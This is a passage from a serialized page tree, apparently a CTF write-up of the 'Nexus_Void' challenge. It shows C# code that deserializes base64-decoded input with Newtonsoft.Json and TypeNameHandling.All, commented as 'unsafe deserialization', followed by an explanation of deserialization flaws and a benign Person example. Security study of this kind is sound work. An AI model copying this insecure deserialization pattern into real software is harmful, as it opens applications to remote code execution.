ype":38,"value":35206},{"type":33,"tag":128,"props":36736,"children":36737},{"style":312},[36738],{"type":38,"value":7246},{"type":33,"tag":128,"props":36740,"children":36741},{"style":140},[36742],{"type":38,"value":35163},{"type":33,"tag":128,"props":36744,"children":36745},{"style":312},[36746],{"type":38,"value":5730},{"type":33,"tag":128,"props":36748,"children":36749},{"style":140},[36750],{"type":38,"value":6040},{"type":33,"tag":128,"props":36752,"children":36753},{"style":676},[36754],{"type":38,"value":669},{"type":33,"tag":128,"props":36756,"children":36757},{"style":312},[36758],{"type":38,"value":5676},{"type":33,"tag":128,"props":36760,"children":36761},{"class":130,"line":804},[36762,36766,36770,36774,36778,36782,36786,36790,36794,36798,36802,36806,36810],{"type":33,"tag":128,"props":36763,"children":36764},{"style":300},[36765],{"type":38,"value":35457},{"type":33,"tag":128,"props":36767,"children":36768},{"style":135},[36769],{"type":38,"value":35462},{"type":33,"tag":128,"props":36771,"children":36772},{"style":312},[36773],{"type":38,"value":5657},{"type":33,"tag":128,"props":36775,"children":36776},{"style":306},[36777],{"type":38,"value":35471},{"type":33,"tag":128,"props":36779,"children":36780},{"style":312},[36781],{"type":38,"value":215},{"type":33,"tag":128,"props":36783,"children":36784},{"style":306},[36785],{"type":38,"value":35480},{"type":33,"tag":128,"props":36787,"children":36788},{"style":312},[36789],{"type":38,"value":215},{"type":33,"tag":128,"props":36791,"children":36792},{"style":135},[36793],{"type":38,"value":35489},{"type":33,"tag":128,"props":36795,"children":36796},{"style":312},[36797],{"type":38,"value":5566},{"type":33,"tag":128,"props":36799,"children":36800},{"style":306},[36801],{"type":38,"value":35498},{"type":33,"tag":128,"props":36803,"children":36804},{"style":312},[36805],{"type":38,"value":6700},{"type":33,"tag":128,"props":36807,"children":36808},{"style":135},[36809],{"type":38,"value":35507},{"type":33,"tag":128,"props":36811,"children":36812},{"style":312},[36813],{"type":38,"value":15496},{"type":33,"tag":128,"props":36815,"children":36816},{"class":130,"line":839},[36817],{"type":33,"tag":128,"props":36818,"children":36819},{"emptyLinePlaceholder":896},[36820],{"type":38,"value":899},{"type":33,"tag":128,"props":36822,"children":36823},{"class":130,"line":848},[36824,36828,36832,36836,36840,36844,36848,36852,36856,36860,36864,36868,36872,36876,36880],{"type":33,"tag":128,"props":36825,"children":36826},{"style":1576},[36827],{"type":38,"value":6625},{"type":33,"tag":128,"props":36829,"children":36830},{"style":312},[36831],{"type":38,"value":2852},{"type":33,"tag":128,"props":36833,"children":36834},{"style":306},[36835],{"type":38,"value":35712},{"type":33,"tag":128,"props":36837,"children":36838},{"style":300},[36839],{"type":38,"value":35717},{"type":33,"tag":128,"props":36841,"children":36842},{"style":300},[36843],{"type":38,"value":35722},{"type":33,"tag":128,"props":36845,"children":36846},{"style":300},[36847],{"type":38,"value":10037},{"type":33,"tag":128,"props":36849,"children":36850},{"style":300},[36851],{"type":38,"value":35731},{"type":33,"tag":128,"props":36853,"children":36854},{"style":1576},[36855],{"type":38,"value":35317},{"type":33,"tag":128,"props":36857,"children":36858},{"style":312},[36859],{"type":38,"value":215},{"type":33,"tag":128,"props":36861,"children":36862},{"style":135},[36863],{"type":38,"value":35668},{"type":33,"tag":128,"props":36865,"children":36866},{"style":312},[36867],{"type":38,"value":5566},{"type":33,"tag":128,"props":36869,"children":36870},{"style":306},[36871],{"type":38,"value":35712},{"type":33,"tag":128,"props":36873,"children":36874},{"style":312},[36875],{"type":38,"value":215},{"type":33,"tag":128,"props":36877,"children":36878},{"style":306},[36879],{"type":38,"value":2815},{"type":33,"tag":128,"props":36881,"children":36882},{"style":312},[36883],{"type":38,"value":2459},{"type":33,"tag":128,"props":36885,"children":36886},{"class":130,"line":976},[36887],{"type":33,"tag":128,"props":36888,"children":36889},{"style":312},[36890],{"type":38,"value":12699},{"type":33,"tag":128,"props":36892,"children":36893},{"class":130,"line":988},[36894],{"type":33,"tag":128,"props":36895,"children":36896},{"style":5541},[36897],{"type":38,"value":36898}," // Here we can see an deserialization directly from the database result\n",{"type":33,"tag":128,"props":36900,"children":36901},{"class":130,"line":1001},[36902,36906,36910,36914,36918,36922,36926,36930,36934,36938,36942,36946,36950,36954],{"type":33,"tag":128,"props":36903,"children":36904},{"style":30339},[36905],{"type":38,"value":26623},{"type":33,"tag":128,"props":36907,"children":36908},{"style":312},[36909],{"type":38,"value":5977},{"type":33,"tag":128,"props":36911,"children":36912},{"style":30339},[36913],{"type":38,"value":35788},{"type":33,"tag":128,"props":36915,"children":36916},{"style":312},[36917],{"type":38,"value":6054},{"type":33,"tag":128,"props":36919,"children":36920},{"style":135},[36921],{"type":38,"value":35797},{"type":33,"tag":128,"props":36923,"children":36924},{"style":312},[36925],{"type":38,"value":5657},{"type":33,"tag":128,"props":36927,"children":36928},{"style":306},[36929],{"type":38,"value":35806},{"type":33,"tag":128,"props":36931,"children":36932},{"style":312},[36933],{"type":38,"value":215},{"type":33,"tag":128,"props":36935,"children":36936},{"style":135},[36937],{"type":38,"value":35815},{"type":33,"tag":128,"props":36939,"children":36940},{"style":312},[36941],{"type":38,"value":5566},{"type":33,"tag":128,"props":36943,"children":36944},{"style":306},[36945],{"type":38,"value":35712},{"type":33,"tag":128,"props":36947,"children":36948},{"style":312},[36949],{"type":38,"value":215},{"type":33,"tag":128,"props":36951,"children":36952},{"style":306},[36953],{"type":38,"value":2815},{"type":33,"tag":128,"props":36955,"children":36956},{"style":312},[36957],{"type":38,"value":5815},{"type":33,"tag":128,"props":36959,"children":36960},{"class":130,"line":1014},[36961,36965,36970,36974,36978],{"type":33,"tag":128,"props":36962,"children":36963},{"style":1576},[36964],{"type":38,"value":13615},{"type":33,"tag":128,"props":36966,"children":36967},{"style":135},[36968],{"type":38,"value":36969}," View",{"type":33,"tag":128,"props":36971,"children":36972},{"style":312},[36973],{"type":38,"value":5566},{"type":33,"tag":128,"props":36975,"children":36976},{"style":306},[36977],{"type":38,"value":36071},{"type":33,"tag":128,"props":36979,"children":36980},{"style":312},[36981],{"type":38,"value":5815},{"type":33,"tag":128,"props":36983,"children":36984},{"class":130,"line":1026},[36985],{"type":33,"tag":128,"props":36986,"children":36987},{"emptyLinePlaceholder":896},[36988],{"type":38,"value":899},{"type":33,"tag":128,"props":36990,"children":36991},{"class":130,"line":1038},[36992],{"type":33,"tag":128,"props":36993,"children":36994},{"style":312},[36995],{"type":38,"value":6760},{"type":33,"tag":128,"props":36997,"children":36998},{"class":130,"line":1051},[36999,37003,37007,37011],{"type":33,"tag":128,"props":37000,"children":37001},{"style":312},[37002],{"type":38,"value":35251},{"type":33,"tag":128,"props":37004,"children":37005},{"style":300},[37006],{"type":38,"value":35256},{"type":33,"tag":128,"props":37008,"children":37009},{"style":323},[37010],{"type":38,"value":215},{"type":33,"tag":128,"props":37012,"children":37013},{"style":312},[37014],{"type":38,"value":3262},{"type":33,"tag":128,"props":37016,"children":37017},{"class":130,"line":1063},[37018],{"type":33,"tag":128,"props":37019,"children":37020},{"style":312},[37021],{"type":38,"value":854},{"type":33,"tag":47,"props":37023,"children":37024},{},[37025],{"type":38,"value":37026},"And the SerializeHelper class is as follows:",{"type":33,"tag":114,"props":37028,"children":37029},{"lang":35074},[37030],{"type":33,"tag":119,"props":37031,"children":37033},{"code":37032,"language":35074,"meta":8,"className":35079,"style":8},"using Newtonsoft.Json;\nusing Nexus_Void.Models;\n\nnamespace Nexus_Void.Helpers\n{\n public class SerializeHelper\n {\n public static string Serialize(List\u003CProductModel> list)\n {\n string serializedResult = JsonConvert.SerializeObject(list, new JsonSerializerSettings\n {\n TypeNameHandling = TypeNameHandling.All\n });\n\n string encodedData = EncodeHelper.Encode(serializedResult);\n return encodedData;\n }\n\n public static List\u003CProductModel> Deserialize(string str) \n {\n string decodedData = EncodeHelper.Decode(str);\n \n // unsafe deserialization\n var deserialized = JsonConvert.DeserializeObject(decodedData, new JsonSerializerSettings\n {\n TypeNameHandling = TypeNameHandling.All\n });\n\n List\u003CProductModel> products = deserialized as List\u003CProductModel>;\n\n return products;\n }\n }\n}\n",[37034],{"type":33,"tag":105,"props":37035,"children":37036},{"__ignoreMap":8},[37037,37063,37088,37095,37116,37123,37140,37147,37197,37204,37256,37263,37289,37297,37304,37347,37362,37369,37376,37429,37436,37478,37486,37494,37545,37552,37575,37582,37589,37641,37648,37663,37670,37677],{"type":33,"tag":128,"props":37038,"children":37039},{"class":130,"line":131},[37040,37045,37050,37054,37059],{"type":33,"tag":128,"props":37041,"children":37042},{"style":1576},[37043],{"type":38,"value":37044},"using",{"type":33,"tag":128,"props":37046,"children":37047},{"style":30339},[37048],{"type":38,"value":37049}," Newtonsoft",{"type":33,"tag":128,"props":37051,"children":37052},{"style":312},[37053],{"type":38,"value":215},{"type":33,"tag":128,"props":37055,"children":37056},{"style":30339},[37057],{"type":38,"value":37058},"Json",{"type":33,"tag":128,"props":37060,"children":37061},{"style":312},[37062],{"type":38,"value":5676},{"type":33,"tag":128,"props":37064,"children":37065},{"class":130,"line":362},[37066,37070,37075,37079,37084],{"type":33,"tag":128,"props":37067,"children":37068},{"style":1576},[37069],{"type":38,"value":37044},{"type":33,"tag":128,"props":37071,"children":37072},{"style":30339},[37073],{"type":38,"value":37074}," Nexus_Void",{"type":33,"tag":128,"props":37076,"children":37077},{"style":312},[37078],{"type":38,"value":215},{"type":33,"tag":128,"props":37080,"children":37081},{"style":30339},[37082],{"type":38,"value":37083},"Models",{"type":33,"tag":128,"props":37085,"children":37086},{"style":312},[37087],{"type":38,"value":5676},{"type":33,"tag":128,"props":37089,"children":37090},{"class":130,"line":403},[37091],{"type":33,"tag":128,"props":37092,"children":37093},{"emptyLinePlaceholder":896},[37094],{"type":38,"value":899},{"type":33,"tag":128,"props":37096,"children":37097},{"class":130,"line":739},[37098,37103,37107,37111],{"type":33,"tag":128,"props":37099,"children":37100},{"style":300},[37101],{"type":38,"value":37102},"namespace",{"type":33,"tag":128,"props":37104,"children":37105},{"style":30339},[37106],{"type":38,"value":37074},{"type":33,"tag":128,"props":37108,"children":37109},{"style":312},[37110],{"type":38,"value":215},{"type":33,"tag":128,"props":37112,"children":37113},{"style":30339},[37114],{"type":38,"value":37115},"Helpers\n",{"type":33,"tag":128,"props":37117,"children":37118},{"class":130,"line":765},[37119],{"type":33,"tag":128,"props":37120,"children":37121},{"style":312},[37122],{"type":38,"value":650},{"type":33,"tag":128,"props":37124,"children":37125},{"class":130,"line":804},[37126,37131,37135],{"type":33,"tag":128,"props":37127,"children":37128},{"style":300},[37129],{"type":38,"value":37130}," public",{"type":33,"tag":128,"props":37132,"children":37133},{"style":300},[37134],{"type":38,"value":6009},{"type":33,"tag":128,"props":37136,"children":37137},{"style":30339},[37138],{"type":38,"value":37139}," SerializeHelper\n",{"type":33,"tag":128,"props":37141,"children":37142},{"class":130,"line":839},[37143],{"type":33,"tag":128,"props":37144,"children":37145},{"style":312},[37146],{"type":38,"value":12699},{"type":33,"tag":128,"props":37148,"children":37149},{"class":130,"line":848},[37150,37155,37159,37163,37168,37172,37177,37181,37185,37189,37193],{"type":33,"tag":128,"props":37151,"children":37152},{"style":300},[37153],{"type":38,"value":37154}," public",{"type":33,"tag":128,"props":37156,"children":37157},{"style":300},[37158],{"type":38,"value":25958},{"type":33,"tag":128,"props":37160,"children":37161},{"style":1576},[37162],{"type":38,"value":35330},{"type":33,"tag":128,"props":37164,"children":37165},{"style":135},[37166],{"type":38,"value":37167}," Serialize",{"type":33,"tag":128,"props":37169,"children":37170},{"style":312},[37171],{"type":38,"value":5566},{"type":33,"tag":128,"props":37173,"children":37174},{"style":30339},[37175],{"type":38,"value":37176},"List",{"type":33,"tag":128,"props":37178,"children":37179},{"style":312},[37180],{"type":38,"value":5977},{"type":33,"tag":128,"props":37182,"children":37183},{"style":30339},[37184],{"type":38,"value":35788},{"type":33,"tag":128,"props":37186,"children":37187},{"style":312},[37188],{"type":38,"value":6054},{"type":33,"tag":128,"props":37190,"children":37191},{"style":135},[37192],{"type":38,"value":3675},{"type":33,"tag":128,"props":37194,"children":37195},{"style":312},[37196],{"type":38,"value":2427},{"type":33,"tag":128,"props":37198,"children":37199},{"class":130,"line":976},[37200],{"type":33,"tag":128,"props":37201,"children":37202},{"style":312},[37203],{"type":38,"value":35771},{"type":33,"tag":128,"props":37205,"children":37206},{"class":130,"line":988},[37207,37211,37216,37220,37225,37229,37234,37238,37243,37247,37251],{"type":33,"tag":128,"props":37208,"children":37209},{"style":1576},[37210],{"type":38,"value":36040},{"type":33,"tag":128,"props":37212,"children":37213},{"style":135},[37214],{"type":38,"value":37215}," serializedResult",{"type":33,"tag":128,"props":37217,"children":37218},{"style":312},[37219],{"type":38,"value":5657},{"type":33,"tag":128,"props":37221,"children":37222},{"style":306},[37223],{"type":38,"value":37224}," JsonConvert",{"type":33,"tag":128,"props":37226,"children":37227},{"style":312},[37228],{"type":38,"value":215},{"type":33,"tag":128,"props":37230,"children":37231},{"style":135},[37232],{"type":38,"value":37233},"SerializeObject",{"type":33,"tag":128,"props":37235,"children":37236},{"style":312},[37237],{"type":38,"value":5566},{"type":33,"tag":128,"props":37239,"children":37240},{"style":306},[37241],{"type":38,"value":37242},"list",{"type":33,"tag":128,"props":37244,"children":37245},{"style":312},[37246],{"type":38,"value":5584},{"type":33,"tag":128,"props":37248,"children":37249},{"style":300},[37250],{"type":38,"value":13061},{"type":33,"tag":128,"props":37252,"children":37253},{"style":30339},[37254],{"type":38,"value":37255}," JsonSerializerSettings\n",{"type":33,"tag":128,"props":37257,"children":37258},{"class":130,"line":1001},[37259],{"type":33,"tag":128,"props":37260,"children":37261},{"style":312},[37262],{"type":38,"value":35954},{"type":33,"tag":128,"props":37264,"children":37265},{"class":130,"line":1014},[37266,37271,37275,37280,37284],{"type":33,"tag":128,"props":37267,"children":37268},{"style":306},[37269],{"type":38,"value":37270}," TypeNameHandling",{"type":33,"tag":128,"props":37272,"children":37273},{"style":312},[37274],{"type":38,"value":5657},{"type":33,"tag":128,"props":37276,"children":37277},{"style":306},[37278],{"type":38,"value":37279}," TypeNameHandling",{"type":33,"tag":128,"props":37281,"children":37282},{"style":312},[37283],{"type":38,"value":215},{"type":33,"tag":128,"props":37285,"children":37286},{"style":306},[37287],{"type":38,"value":37288},"All\n",{"type":33,"tag":128,"props":37290,"children":37291},{"class":130,"line":1026},[37292],{"type":33,"tag":128,"props":37293,"children":37294},{"style":312},[37295],{"type":38,"value":37296}," });\n",{"type":33,"tag":128,"props":37298,"children":37299},{"class":130,"line":1038},[37300],{"type":33,"tag":128,"props":37301,"children":37302},{"emptyLinePlaceholder":896},[37303],{"type":38,"value":899},{"type":33,"tag":128,"props":37305,"children":37306},{"class":130,"line":1051},[37307,37311,37316,37320,37325,37329,37334,37338,37343],{"type":33,"tag":128,"props":37308,"children":37309},{"style":1576},[37310],{"type":38,"value":36040},{"type":33,"tag":128,"props":37312,"children":37313},{"style":135},[37314],{"type":38,"value":37315}," encodedData",{"type":33,"tag":128,"props":37317,"children":37318},{"style":312},[37319],{"type":38,"value":5657},{"type":33,"tag":128,"props":37321,"children":37322},{"style":306},[37323],{"type":38,"value":37324}," EncodeHelper",{"type":33,"tag":128,"props":37326,"children":37327},{"style":312},[37328],{"type":38,"value":215},{"type":33,"tag":128,"props":37330,"children":37331},{"style":135},[37332],{"type":38,"value":37333},"Encode",{"type":33,"tag":128,"props":37335,"children":37336},{"style":312},[37337],{"type":38,"value":5566},{"type":33,"tag":128,"props":37339,"children":37340},{"style":306},[37341],{"type":38,"value":37342},"serializedResult",{"type":33,"tag":128,"props":37344,"children":37345},{"style":312},[37346],{"type":38,"value":5815},{"type":33,"tag":128,"props":37348,"children":37349},{"class":130,"line":1063},[37350,37354,37358],{"type":33,"tag":128,"props":37351,"children":37352},{"style":1576},[37353],{"type":38,"value":26723},{"type":33,"tag":128,"props":37355,"children":37356},{"style":306},[37357],{"type":38,"value":37315},{"type":33,"tag":128,"props":37359,"children":37360},{"style":312},[37361],{"type":38,"value":5676},{"type":33,"tag":128,"props":37363,"children":37364},{"class":130,"line":1076},[37365],{"type":33,"tag":128,"props":37366,"children":37367},{"style":312},[37368],{"type":38,"value":15318},{"type":33,"tag":128,"props":37370,"children":37371},{"class":130,"line":1089},[37372],{"type":33,"tag":128,"props":37373,"children":37374},{"emptyLinePlaceholder":896},[37375],{"type":38,"value":899},{"type":33,"tag":128,"props":37377,"children":37378},{"class":130,"line":1101},[37379,37383,37387,37391,37395,37399,37403,37408,37412,37416,37421,37425],{"type":33,"tag":128,"props":37380,"children":37381},{"style":300},[37382],{"type":38,"value":37154},{"type":33,"tag":128,"props":37384,"children":37385},{"style":300},[37386],{"type":38,"value":25958},{"type":33,"tag":128,"props":37388,"children":37389},{"style":30339},[37390],{"type":38,"value":36296},{"type":33,"tag":128,"props":37392,"children":37393},{"style":312},[37394],{"type":38,"value":5977},{"type":33,"tag":128,"props":37396,"children":37397},{"style":30339},[37398],{"type":38,"value":35788},{"type":33,"tag":128,"props":37400,"children":37401},{"style":312},[37402],{"type":38,"value":6054},{"type":33,"tag":128,"props":37404,"children":37405},{"style":135},[37406],{"type":38,"value":37407}," Deserialize",{"type":33,"tag":128,"props":37409,"children":37410},{"style":312},[37411],{"type":38,"value":5566},{"type":33,"tag":128,"props":37413,"children":37414},{"style":1576},[37415],{"type":38,"value":35317},{"type":33,"tag":128,"props":37417,"children":37418},{"style":135},[37419],{"type":38,"value":37420}," str",{"type":33,"tag":128,"props":37422,"children":37423},{"style":312},[37424],{"type":38,"value":2966},{"type":33,"tag":128,"props":37426,"children":37427},{"style":323},[37428],{"type":38,"value":2008},{"type":33,"tag":128,"props":37430,"children":37431},{"class":130,"line":1114},[37432],{"type":33,"tag":128,"props":37433,"children":37434},{"style":312},[37435],{"type":38,"value":35771},{"type":33,"tag":128,"props":37437,"children":37438},{"class":130,"line":1127},[37439,37443,37448,37452,37456,37460,37465,37469,37474],{"type":33,"tag":128,"props":37440,"children":37441},{"style":1576},[37442],{"type":38,"value":36040},{"type":33,"tag":128,"props":37444,"children":37445},{"style":135},[37446],{"type":38,"value":37447}," decodedData",{"type":33,"tag":128,"props":37449,"children":37450},{"style":312},[37451],{"type":38,"value":5657},{"type":33,"tag":128,"props":37453,"children":37454},{"style":306},[37455],{"type":38,"value":37324},{"type":33,"tag":128,"props":37457,"children":37458},{"style":312},[37459],{"type":38,"value":215},{"type":33,"tag":128,"props":37461,"children":37462},{"style":135},[37463],{"type":38,"value":37464},"Decode",{"type":33,"tag":128,"props":37466,"children":37467},{"style":312},[37468],{"type":38,"value":5566},{"type":33,"tag":128,"props":37470,"children":37471},{"style":306},[37472],{"type":38,"value":37473},"str",{"type":33,"tag":128,"props":37475,"children":37476},{"style":312},[37477],{"type":38,"value":5815},{"type":33,"tag":128,"props":37479,"children":37480},{"class":130,"line":1139},[37481],{"type":33,"tag":128,"props":37482,"children":37483},{"style":323},[37484],{"type":38,"value":37485}," \n",{"type":33,"tag":128,"props":37487,"children":37488},{"class":130,"line":1152},[37489],{"type":33,"tag":128,"props":37490,"children":37491},{"style":5541},[37492],{"type":38,"value":37493}," // unsafe deserialization\n",{"type":33,"tag":128,"props":37495,"children":37496},{"class":130,"line":1165},[37497,37502,37507,37511,37515,37519,37524,37528,37533,37537,37541],{"type":33,"tag":128,"props":37498,"children":37499},{"style":300},[37500],{"type":38,"value":37501}," var",{"type":33,"tag":128,"props":37503,"children":37504},{"style":135},[37505],{"type":38,"value":37506}," deserialized",{"type":33,"tag":128,"props":37508,"children":37509},{"style":312},[37510],{"type":38,"value":5657},{"type":33,"tag":128,"props":37512,"children":37513},{"style":306},[37514],{"type":38,"value":37224},{"type":33,"tag":128,"props":37516,"children":37517},{"style":312},[37518],{"type":38,"value":215},{"type":33,"tag":128,"props":37520,"children":37521},{"style":135},[37522],{"type":38,"value":37523},"DeserializeObject",{"type":33,"tag":128,"props":37525,"children":37526},{"style":312},[37527],{"type":38,"value":5566},{"type":33,"tag":128,"props":37529,"children":37530},{"style":306},[37531],{"type":38,"value":37532},"decodedData",{"type":33,"tag":128,"props":37534,"children":37535},{"style":312},[37536],{"type":38,"value":5584},{"type":33,"tag":128,"props":37538,"children":37539},{"style":300},[37540],{"type":38,"value":13061},{"type":33,"tag":128,"props":37542,"children":37543},{"style":30339},[37544],{"type":38,"value":37255},{"type":33,"tag":128,"props":37546,"children":37547},{"class":130,"line":1177},[37548],{"type":33,"tag":128,"props":37549,"children":37550},{"style":312},[37551],{"type":38,"value":35954},{"type":33,"tag":128,"props":37553,"children":37554},{"class":130,"line":1189},[37555,37559,37563,37567,37571],{"type":33,"tag":128,"props":37556,"children":37557},{"style":306},[37558],{"type":38,"value":37270},{"type":33,"tag":128,"props":37560,"children":37561},{"style":312},[37562],{"type":38,"value":5657},{"type":33,"tag":128,"props":37564,"children":37565},{"style":306},[37566],{"type":38,"value":37279},{"type":33,"tag":128,"props":37568,"children":37569},{"style":312},[37570],{"type":38,"value":215},{"type":33,"tag":128,"props":37572,"children":37573},{"style":306},[37574],{"type":38,"value":37288},{"type":33,"tag":128,"props":37576,"children":37577},{"class":130,"line":1202},[37578],{"type":33,"tag":128,"props":37579,"children":37580},{"style":312},[37581],{"type":38,"value":37296},{"type":33,"tag":128,"props":37583,"children":37584},{"class":130,"line":1214},[37585],{"type":33,"tag":128,"props":37586,"children":37587},{"emptyLinePlaceholder":896},[37588],{"type":38,"value":899},{"type":33,"tag":128,"props":37590,"children":37591},{"class":130,"line":1226},[37592,37596,37600,37604,37608,37612,37616,37620,37624,37628,37632,37636],{"type":33,"tag":128,"props":37593,"children":37594},{"style":30339},[37595],{"type":38,"value":35779},{"type":33,"tag":128,"props":37597,"children":37598},{"style":312},[37599],{"type":38,"value":5977},{"type":33,"tag":128,"props":37601,"children":37602},{"style":30339},[37603],{"type":38,"value":35788},{"type":33,"tag":128,"props":37605,"children":37606},{"style":312},[37607],{"type":38,"value":6054},{"type":33,"tag":128,"props":37609,"children":37610},{"style":135},[37611],{"type":38,"value":35797},{"type":33,"tag":128,"props":37613,"children":37614},{"style":312},[37615],{"type":38,"value":5657},{"type":33,"tag":128,"props":37617,"children":37618},{"style":306},[37619],{"type":38,"value":37506},{"type":33,"tag":128,"props":37621,"children":37622},{"style":300},[37623],{"type":38,"value":10759},{"type":33,"tag":128,"props":37625,"children":37626},{"style":30339},[37627],{"type":38,"value":36296},{"type":33,"tag":128,"props":37629,"children":37630},{"style":312},[37631],{"type":38,"value":5977},{"type":33,"tag":128,"props":37633,"children":37634},{"style":30339},[37635],{"type":38,"value":35788},{"type":33,"tag":128,"props":37637,"children":37638},{"style":312},[37639],{"type":38,"value":37640},">;\n",{"type":33,"tag":128,"props":37642,"children":37643},{"class":130,"line":1239},[37644],{"type":33,"tag":128,"props":37645,"children":37646},{"emptyLinePlaceholder":896},[37647],{"type":38,"value":899},{"type":33,"tag":128,"props":37649,"children":37650},{"class":130,"line":1251},[37651,37655,37659],{"type":33,"tag":128,"props":37652,"children":37653},{"style":1576},[37654],{"type":38,"value":26723},{"type":33,"tag":128,"props":37656,"children":37657},{"style":306},[37658],{"type":38,"value":35797},{"type":33,"tag":128,"props":37660,"children":37661},{"style":312},[37662],{"type":38,"value":5676},{"type":33,"tag":128,"props":37664,"children":37665},{"class":130,"line":1263},[37666],{"type":33,"tag":128,"props":37667,"children":37668},{"style":312},[37669],{"type":38,"value":15318},{"type":33,"tag":128,"props":37671,"children":37672},{"class":130,"line":1276},[37673],{"type":33,"tag":128,"props":37674,"children":37675},{"style":312},[37676],{"type":38,"value":6760},{"type":33,"tag":128,"props":37678,"children":37679},{"class":130,"line":1288},[37680],{"type":33,"tag":128,"props":37681,"children":37682},{"style":312},[37683],{"type":38,"value":854},{"type":33,"tag":47,"props":37685,"children":37686},{},[37687],{"type":33,"tag":2302,"props":37688,"children":37689},{},[37690],{"type":38,"value":37691},"It is also important to note that the class responsible for deserializing the objects also encodes and decodes them in base64.",{"type":33,"tag":81,"props":37693,"children":37695},{"id":37694},"what-is-a-serialization",[37696],{"type":38,"value":37697},"What is a serialization?",{"type":33,"tag":47,"props":37699,"children":37700},{},[37701],{"type":38,"value":37702},"Serialization and deserialization are essential processes in computer science that involve converting data into a format that can be easily stored, transmitted, or reconstructed.",{"type":33,"tag":47,"props":37704,"children":37705},{},[37706],{"type":38,"value":37707},"It refers to the process of converting an object or data structure into a format (often a byte stream) that can be easily stored in memory. During serialization, complex data structures or objects are converted into a linear stream of bytes that can be easily reconstructed back into the original format when needed.",{"type":33,"tag":47,"props":37709,"children":37710},{},[37711],{"type":38,"value":37712},"The vulnerability known as the \"deserialization vulnerability\" in C# and other programming languages arises due to the mishandling or inadequate validation of serialized data, leading to potential security risks.",{"type":33,"tag":47,"props":37714,"children":37715},{},[37716],{"type":38,"value":37717},"When data is deserialized, it is converted from its serialized form (often binary or text) back into an object or data structure. If this process is not properly secured, malicious actors may exploit it by inserting crafted or malicious input during deserialization, leading to various security issues.",{"type":33,"tag":47,"props":37719,"children":37720},{},[37721],{"type":38,"value":37722},"Suppose our objective involves a .NET program/website as the target, capable of accepting data in JSON format through a network, maybe via an HTTP header on a website. Upon reaching the server, the data undergoes conversion (deserialization) from JSON text into an instance of the Person class, usable by the .NET code.",{"type":33,"tag":47,"props":37724,"children":37725},{},[37726],{"type":38,"value":37727},"If the configuration of the conversion process is inadequate, we can specify a different .NET class for the data to be transformed into, rather than automatically reverting it back into the Person class.",{"type":33,"tag":47,"props":37729,"children":37730},{},[37731],{"type":38,"value":37732},"Here is a quick example with a simple Person class.",{"type":33,"tag":47,"props":37734,"children":37735},{},[37736],{"type":38,"value":37737},"In the code below, we have a class that we serialize and deserialize:",{"type":33,"tag":114,"props":37739,"children":37740},{"lang":35074},[37741],{"type":33,"tag":119,"props":37742,"children":37744},{"code":37743,"language":35074,"meta":8,"className":35079,"style":8},"using System;\nusing Newtonsoft.Json;\nusing System.Collections.Generic;\n\n class Person\n {\n public string Name { get; set; }\n public int Age { get; set; }\n }\n\n\npublic class Program\n{\n public static void Main()\n {\n Person person = new Person { Name = \"John\", Age = 30 };\n \n string json = JsonConvert.SerializeObject(person);\n Console.WriteLine(\"Serialized Person:\");\n Console.WriteLine(json);\n Person deserializedPerson = JsonConvert.DeserializeObject\u003CPerson>(json);\n Console.WriteLine(\"\\nDeserialized Person:\");\n Console.WriteLine(\"Name:\" + deserializedPerson.Name + \" Age:\" + deserializedPerson.Age);\n }\n}\n",[37745],{"type":33,"tag":105,"props":37746,"children":37747},{"__ignoreMap":8},[37748,37764,37787,37820,37827,37839,37846,37889,37929,37936,37943,37950,37966,37973,37998,38005,38078,38085,38126,38164,38191,38241,38282,38369,38376],{"type":33,"tag":128,"props":37749,"children":37750},{"class":130,"line":131},[37751,37755,37760],{"type":33,"tag":128,"props":37752,"children":37753},{"style":1576},[37754],{"type":38,"value":37044},{"type":33,"tag":128,"props":37756,"children":37757},{"style":30339},[37758],{"type":38,"value":37759}," System",{"type":33,"tag":128,"props":37761,"children":37762},{"style":312},[37763],{"type":38,"value":5676},{"type":33,"tag":128,"props":37765,"children":37766},{"class":130,"line":362},[37767,37771,37775,37779,37783],{"type":33,"tag":128,"props":37768,"children":37769},{"style":1576},[37770],{"type":38,"value":37044},{"type":33,"tag":128,"props":37772,"children":37773},{"style":30339},[37774],{"type":38,"value":37049},{"type":33,"tag":128,"props":37776,"children":37777},{"style":312},[37778],{"type":38,"value":215},{"type":33,"tag":128,"props":37780,"children":37781},{"style":30339},[37782],{"type":38,"value":37058},{"type":33,"tag":128,"props":37784,"children":37785},{"style":312},[37786],{"type":38,"value":5676},{"type":33,"tag":128,"props":37788,"children":37789},{"class":130,"line":403},[37790,37794,37798,37802,37807,37811,37816],{"type":33,"tag":128,"props":37791,"children":37792},{"style":1576},[37793],{"type":38,"value":37044},{"type":33,"tag":128,"props":37795,"children":37796},{"style":30339},[37797],{"type":38,"value":37759},{"type":33,"tag":128,"props":37799,"children":37800},{"style":312},[37801],{"type":38,"value":215},{"type":33,"tag":128,"props":37803,"children":37804},{"style":30339},[37805],{"type":38,"value":37806},"Collections",{"type":33,"tag":128,"props":37808,"children":37809},{"style":312},[37810],{"type":38,"value":215},{"type":33,"tag":128,"props":37812,"children":37813},{"style":30339},[37814],{"type":38,"value":37815},"Generic",{"type":33,"tag":128,"props":37817,"children":37818},{"style":312},[37819],{"type":38,"value":5676},{"type":33,"tag":128,"props":37821,"children":37822},{"class":130,"line":739},[37823],{"type":33,"tag":128,"props":37824,"children":37825},{"emptyLinePlaceholder":896},[37826],{"type":38,"value":899},{"type":33,"tag":128,"props":37828,"children":37829},{"class":130,"line":765},[37830,37834],{"type":33,"tag":128,"props":37831,"children":37832},{"style":300},[37833],{"type":38,"value":6009},{"type":33,"tag":128,"props":37835,"children":37836},{"style":30339},[37837],{"type":38,"value":37838}," Person\n",{"type":33,"tag":128,"props":37840,"children":37841},{"class":130,"line":804},[37842],{"type":33,"tag":128,"props":37843,"children":37844},{"style":312},[37845],{"type":38,"value":762},{"type":33,"tag":128,"props":37847,"children":37848},{"class":130,"line":839},[37849,37854,37858,37863,37867,37872,37876,37880,37884],{"type":33,"tag":128,"props":37850,"children":37851},{"style":300},[37852],{"type":38,"value":37853}," public",{"type":33,"tag":128,"props":37855,"children":37856},{"style":1576},[37857],{"type":38,"value":35330},{"type":33,"tag":128,"props":37859,"children":37860},{"style":135},[37861],{"type":38,"value":37862}," Name",{"type":33,"tag":128,"props":37864,"children":37865},{"style":312},[37866],{"type":38,"value":5642},{"type":33,"tag":128,"props":37868,"children":37869},{"style":300},[37870],{"type":38,"value":37871}," 